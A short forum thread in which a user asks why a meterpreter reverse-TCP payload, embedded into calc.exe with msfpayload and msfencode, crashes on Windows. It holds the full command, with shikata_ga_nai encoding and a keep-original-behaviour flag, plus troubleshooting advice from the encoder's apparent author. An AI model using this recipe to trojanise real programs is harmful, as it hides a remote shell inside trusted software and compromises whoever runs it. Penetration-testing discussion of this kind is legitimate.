Msfencode A Msfpayload Into An Existing Executable > Crash


carloss

Hey

I just tried to put meterpreter into an already existing .exe file.

I tried it with the calc.exe and a quiz.exe which I programmed myself.

In both cases it crashed on my Windows 7 machine (64bit); it crashed on my WinXP Pro (32bit) VM too.

I used this command in BT4:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.126 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5

I also tried encoder x86/countdown... No change.

Could someone help me please? :) I know I'm a noob :P


I don't know what that does o_O

:P

It was in an article on LINK and I tried it with it.

On BT4 it does the job without errors like expected but the .exe which gets created does not work at all.

It simply crashed. I tried calc, notepad and a C++ quiz made by me.

Same result: all 3 crashed on Win7 64bit and XP 32bit.

Then I tried the command on BT3 with the calc, notepad and the quiz.

Result:

The Quiz is working fine! Calc and Notepad are not!

I don't understand why! O_O

Hey carloss, I am scriptjunkie, and I just wrote that encoding method a few weeks ago. (see https://www.metasploit.com/redmine/issues/1244 )

If it's really not working, I'd love to figure out why. Please upload your original and encoded executables. (if that doesn't work, email me, I'll message you my address if it's not already displayed somewhere)

Edit: Be sure in the command to use EXITFUNC=thread. Are you using thread and not seh or process exitfunc? SEH will crash and process will kill the process.

64 bit will not work currently, but I don't know why XP 32 bit won't work.

I have tested with as many exe's as I could, and solved as many bugs as I could, but some are not easily solved and I may have missed some. Did you get any error messages?

Thanks,

scriptjunkie

Edited by scriptjunkie